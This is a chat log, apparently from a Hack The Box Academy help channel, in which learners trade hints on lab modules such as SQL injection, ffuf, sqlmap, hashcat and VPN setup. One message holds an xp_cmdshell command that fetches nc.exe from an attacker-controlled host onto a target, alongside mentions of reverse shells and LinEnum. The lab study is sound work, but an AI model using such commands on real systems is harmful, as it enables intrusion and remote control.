
Sorry 🙏🏻

np

Let me think how to do the question right way

🤔

Which section of that module is that?

Subverting Query Logic

I've put my injection in right way i think, but when i do the login it says: "login successful as user: admin"

And i don't want to be admin, i want to be tom, and i don't know why this happens 🤔

So then it isn't right :)

Have just tried it my own.

You can log in as 'tom' and then you see the flag.

Jajaja it's what i think but idk why

The app is showing you how your query was sent to SQL

can anyone help me with using LinEnum script after getting a reverse shell active on a remote server? the script executes but the output is so long i cant read it all and i cant scroll up to look through it on the remote host.

the script automates what you should had looked at in a target so you have to read through the output to find something that can be usefull

good stuffs can be everywhere in the output of the script

right but my problem is that its not allowing me to look at all of the output, its getting cut off and only shows the end of the output

try to put the output in a file

./LinEnum.sh | tee "youroutputfile"

or LinEnum.sh > "youroutputfile"

.

once i do that i can pull the file off the remote host somehow to my attack box?

and then can view it?

why? you are unable to read the file directly from your target

?

oh i see what you mean

i will try this

thank you

you're welcome

Anyone online that could give me a helpful nudge with the Broken Authentication Final Assessment? I can't find any other users.

read all the webpages very carefully

Hello, i have a question about the SQLMAP Essentials module, specifically with Case5 question. I am able to perform the process but i am not getting an expected answer. DM's are open if anyone is around so i can more clearly state my question

Disregard this, i had to reload the target and it worked.

Starting Point - Archetype: NetCat issue.
Hey again, I've been having issues running NetCat on starting point tier-II on the Archetype machine.
I try running :
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.155/usr/share/windows-resources/binaries/nc.exe -outfile nc.exe"
What I receive in python3 -m http.server80:
10.129.230.107 - - [24/Jan/2022 21:52:48] code 404, message File not found
10.129.230.107 - - [24/Jan/2022 21:52:48] "GET /nc.exe HTTP/1.1" 404 -
I also tried :
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.155/nc.exe -outfile nc.exe"
What I receive in python3 -m http.server80:
10.129.230.107 - - [24/Jan/2022 21:54:06] "GET /usr/share/windows-resources/binaries/nc.exe HTTP/1.1" 404 -

I wanna install seclists, what is the pass for sudo?

This is the wrong channel. It will likely not be answered. Go over to #starting-point

thank you!

on kali it's kali

na I mean for the htb box

Hello lads, are we allowed to share youtube videos here?

nice i cant even access the target

Doesn't look like you are doing it right. You aren't connected to HTB's VPN.

oh i have to do it through that?

other times my vm worked fine

oh well

Does this task require downloading a VPN key?

No

Try deploy it in your VM

not host OS

So, then your VM has an issue

Whatever

Lol

@gleaming gate Which module and task is this?

File Inclusion > RFI

You do need.

alright

im just gonna use the htb pwnbox

🤷‍♂️

really

;-;

oh it loaded

lfg

excuse me

i literally do what the section suggests

tf

Nvm found a way to fix it

JUST SHUT UP ALREADY OMFG

Hi

From where I whant to start hacking

https://academy.hackthebox.com/

try tryhackme.com they have great shit

most annoying section confirmed

Is the section old or smth?

NOTHING works

It's literally saying Permission denied because you have insufficient perms, I think you know how to fix it

lol

insufficient perms?

So you mean i need to go sudo?

If it says permission denied, most likely yes

what is the password for pwnbox

Look on desktop

there's a file with credentials

ok found it

THATS SO GREAT

WINDOWS THING DIDNT WORK EITHER LETS GO

If you mean on the pwnbox, seclists is installed already in the /opt/useful directory

Can someone help me with the "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer" question of Linux fundamentals ?
I always got the answer 48 and I can't see what's wrong with the command

Check the very first line of your output.

yes, I see but even 47 isn't accept

this one takes some trimming and cutting.

Can you send your command over in DM? @dry pumice

yeah

@dry pumice So basically you need to have just the URL on each line and then you can sort it out and count only unique lines. Step one, get just the URL on each line

Hi windows priv escla > initial Enumeration> Question: What type of session does this user have? any help i cant get it .. thanks nvm

anyone done Intro to Network Traffic Analysis

Yes

thanks, I found my answer.

Okay, great

just fyi i got past the module, i just think i had an issue upgrading my console once i got the reverse shell. when i redid my whole process today it worked flawlessly and i could scroll/look through all the content i needed to.

anybody have time to help me finish ffuf?

im trying to find a wordlist that doesnt appear as a wordlist or a directory on my system. I tried using the locate command and I get a handful of other wordlists

im trying to

but when I run sqlmap

it shows that it isn't injectable

any tips?

those F'in Linemen 🙂

get em

Im not currently in sqlmap right now, i'm in ffuf

DM

do u still need help

absolutley

Im in value fuzzing

section, Im reading it

u need to create a custom wordlist using the bash oneliner

that works

ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx

this doesnt

i think im a little confused as to what values I need to replace in that general command above

DM me

Hello guys I have been having this issue for a bit. I'm doing the OSINT: CORPORATE RECON on academy. In the Domain Structure section. It told me to get the hosting provider for it. I am pretty sure that I have the answer: ||Digital Ocean||. However it isn't accepting that answer. I'm think it might just be formatting issue or something even though I've tried. Also whois network command isn't working. Dig and ping work just find just whois isn't. Has anybody have had this issue. Help would be highly appreciated. Thanks

I have another question about ffuf, if I cant locate a wordlist in a directory where the exercise says it is located, how do I find it? Or where do I download the list from? I tried the 'locate' command but it doesnt turn up the same path nor the same txt file.

locate command will not work in somecases

try find

sometimes the path may be different

thanks I will try find this time

👍

hello, i seem to be stuck in the file inclusion /directory traversal module. the hardening section. can anyone help?

it says to edit the php.ini file to block system() function but the file is owned by root and no write permissions for htb-student so im confused

dm

you need to go back and look at copy as curl. You might also look at part of that section that your sqlmap statement is missing.

are you looking for seclist?

yes, but locate and find doesnt find the list

are you using pwnbox or your own setup?

on pwnbox it is in /opt/useful. On my Kali distro I had to download it from github. https://github.com/danielmiessler/SecLists

Hello, I am new to HTB and have trouble about windows fundamentals module, the part about NTFS and sharing permissions. I managed to find method for solving problem about firewall but now a new one: SMB1 disabled -- no workgroup available. Help me please😢

which section?

NTFS vs. Share Permissions

and what question?

I didn't got to the questions, I could not connect to the folder through the smbclient

xfreedp ?

yeah

like this?
xfreerdp /v:10.129.43.22 /u:htb-student /p:Academy_WinFun!

yes

can you show the exact error?

"SMB1 disabled -- no workgroup available." Also, before this error, there was one more about firewall, usually you need to disable public firewall in windows settings to continue.

are you using smbclient or xfreedp?

both. xfreerdp for connecting to windows, and smbclient for connecting to folder

I think you should be able to answer the problems just using xfreedp

then powershell

this one is just from reading the section

but the task says differently. the point is to connect through smbclient to shared problem

are you talking about this?

yeah

you dont need to xfreedb before running the client here

what do you mean? In the task I need to connect to xfreerdp windows folder (that is shared) through the smbclient

where does it say that?

why would you use smbclient to check shares of a box you are already on?

can you show me the description of the task?

Alright I am going to bed. I would reccomend only using smbclient OR xfree, I dont think you need to use both at the same time.
for the 3 questions at the end, all 3 can be answered without using smbclient or xfree, just reading and unserstanding the section. Good luck

I am sorry guys but I can not type anywhere else

how do I log in into root please ?

I tried my password and I tried everything, nothing works

on where

pwnbox

HTB academy

I am doing my first challenge

I need to add a user but it asks me for a password

nothing works

sorry on which challenge

linux fundamentals

Theres a text file on the desktop with a password in it that will let you run sudo.

on which section

oh my god my hero

😁

maaan I wasted 1 hours to figue that password out 😄

Thank you for showing me the full format.

Any tips for Cracking Common Passwords from the 'Cracking Passwords with Hashcat' module? I'm stuck since yesterday trying all sorts of rules and modes with no luck...

Hello! Can anyone help me with the "hacking Wordpress" skill assesment. I am stuck with the shell part. I have a shell up and can run commands like whoami, pwd, ls. But how do i run commands like "ls and a specific folder"?

If you’re using the method of RCE using a theme, you may need to url encode any spaces in your command

If I misunderstood your question let me know.

@swift carbon I have tried %20 but not sure if that is a space or not. The thing is that i dont get a error message. If i do it in the browser i get a blank page and THE terminal just give me a new Line.

Hmm. Yea I think %20 is space. DM me so we don’t post spoilers in chat

Hi, I have a question regarding the module 'Information Gathering'.

I am being asked : Target: 10.129.214.235

vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local

Which CMS is used on app.inlanefreight.local? (Format: word)

I understand that I need to use the tool whatweb to identify the CMS used. However this notion of vHosts drives me crazy

I am given an IP address and two subdomains

When a send a request to the given IP address, I get the message 'This is the inlanefreight.local default vhost'. I do not understand what those subdomains are, and which domain I should use with whatweb

Hi everyone i was just wondering if anyone has done the bug bounty hunter path here? if so how long did it take you/how much time did you put in a day? thanks

I would say I work 10 hours a day and each module takes between half a day to a day, some 2 days. Unless I get stuck then it could take a week

The subdomain is the app and the dev. The main domain is inlanefreight.local

Thanks appreciate it! 🙂

cant we connect to target by our own host os?

I understand, but what is the link with the IP address that has been given to me ? I believe 'inlanefreight.local' is linked to the IP address if I consider the message it returns to me

Do you mean the target IP and the domain right?

yes I'm talking about the target IP

?

If you dont use pwnbox You need a to use the academy vpn

Thinking the IP Address is like the address of your home, and the website is accessing one of the port. Thinking port it's like a door, and there is a lot of door. The default for the website is port 80. If you type on your web browser without specifying the port, it will automatically go to port 80. The relation between the vHost and the Target IP is the vHost have the same port in this case port 80. But there is two subdomains, in this case app and dev. Hope that answer your question.

so to solve these problem we have to use their instance

No you can use a machine and a vpn

It is not reccomended just use your personal machine without first getting a virtual machine

i have kali

in virtual box

perfect

but i cant ping targert

with my host os

you need that

should be next to a question, only need to download once tho

then you have to run something like that

depending on where you put the file

mine is obviously on my desktop

i tried that but then also i cant ping

after a successful connection?

hey its working now

yee!

but dint work before

thx

Happy Wednesday!

For CMS tech , you can use Wappalyzer. Some website can see what tech is using, some or not. But at first, you need to visit the website.

It's actually a browser extension that you can install

Yes, they do mention it in the course, along with the tool whatweb in the CL

however this domain cannot be the target of the tools as it does not even resolve. I believe there's a link between the target IP and this 'app' subdomain

If there isn't anything there, trying to visit the website, view the page source and try to google it manually. || I also do that in one of the box in HTB.||

For me , trying to Google every possible name if it's relevant or not. If you are lucky, then you can find it one.

DId you add the vhosts to /etc/hosts?

Forgot to say that, Thanks for adding :)

Hey everyone, I'm stuck on SQLmap essentials - Skills Assessment
I found the attack vector and my sqlmap displayed all the tables within the database however, I am unable to get the contents of the table with the flag. When I run sqlmap now with my working command I get 'Connection refused'

I could use a hint here

DM me

Hai! Cracking passwords with hashcat skill assesment last question. Download a file crack some hashes and then find the most common password.

Now i managed to track the password or well ish. I get a file with alot of passwords tho just 1 of each password so its quite a few less rows than the original document. I need some assistance where to go from here. Do i miss something while cracking or do i need to compare the files and so on. I rly cant find the help in the module.

Whats good fam? This question?

@livid pier yeah that one

Ok when you run hashcat you should notice it says ~1000 hashes then ~800 unique hashes

when you do --show it is showing you the 800 unique passwords

thats why it is looking like you are only getting 1 password match

What I did was take the og hash list into python and make a dictionary of it. I found the most common hash, then ran that again the cracked hashes I had

Hmm.. i need to get abit more tech savvy and filter out the hashes first then. Cheers! ✌️

python split(':')

That will help you

from collections import Counter

will also help to make the dictionary

Cheers

yee!

Anyone around to offer guidance on the cross site scripting final question? -- NVM I got it.

'2>/dev/null' isn't

working, it doesnt return anything

i updatedb

2>/dev/null It's not supposed to return anything. It rather redirects all error messages to trash

oh really?

2 stands for stderr - feel free to Google what this is. And then google also what /dev/null is :)

idk how to set up the vpn for the modules

can someone help

Yes!

You on kali or pwnbox?

im on the hackthebox website

whats that stuff